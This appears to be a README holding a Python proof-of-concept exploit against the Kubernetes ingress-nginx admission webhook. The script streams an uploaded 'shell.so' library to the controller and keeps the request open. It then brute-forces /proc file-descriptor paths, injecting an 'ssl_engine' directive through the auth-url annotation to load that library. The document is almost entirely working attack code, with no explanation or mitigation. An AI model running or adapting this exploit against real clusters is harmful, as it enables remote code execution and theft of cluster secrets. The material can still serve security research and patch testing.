README.md
Rendering markdown...
import asyncio
import json
import httpx
admission_url = "https://ingress-nginx-controller-admission.ingress-nginx.svc:443/networking/v1/ingresses"
url = "http://ingress-nginx-controller.ingress-nginx.svc/fake/addr"
# or use port-forward to prove locally
# kubectl port-forward -n ingress-nginx svc/ingress-nginx-controller 8080:80
# kubectl port-forward -n ingress-nginx svc/ingress-nginx-controller-admission 8443:443
admission_url = "https://localhost:8443/networking/v1/ingresses"
url = "http://localhost:8080/fake/addr"
with open("req.json", "r") as f:
data = json.load(f)
with open("shell.so", "rb") as f:
shellcode = f.read()
async def send_admission_req():
async with httpx.AsyncClient(verify=False) as client:
for pid in range(30, 90):
for fd in range(10, 40):
p = f"/proc/{pid}/fd/{fd}"
data["request"]["object"]["metadata"]["annotations"][
"nginx.ingress.kubernetes.io/auth-url"
] = "http://example.com/#;}}}\n\nssl_engine %s;\n\n" % (p,)
try:
resp = await client.post(
admission_url,
json=data,
)
print("Testing", p)
res = resp.json()["response"]
if "No such device or address" in res["status"]["message"] or (
"No such file or directory" in res["status"]["message"]
):
continue
except:
print("Error parsing response")
continue
print(resp.json())
return
async def upload():
class FakeIterator:
def __init__(self):
self.done = False
async def __aiter__(self):
yield shellcode
await asyncio.sleep(60 * 60 * 60)
async with httpx.AsyncClient() as client:
res = await client.post(
url,
data=FakeIterator(),
)
print("Posting done")
if __name__ == "__main__":
loop = asyncio.get_event_loop()
loop.run_until_complete(
asyncio.gather(*[upload() for _ in range(10)], send_admission_req())
)
loop.close()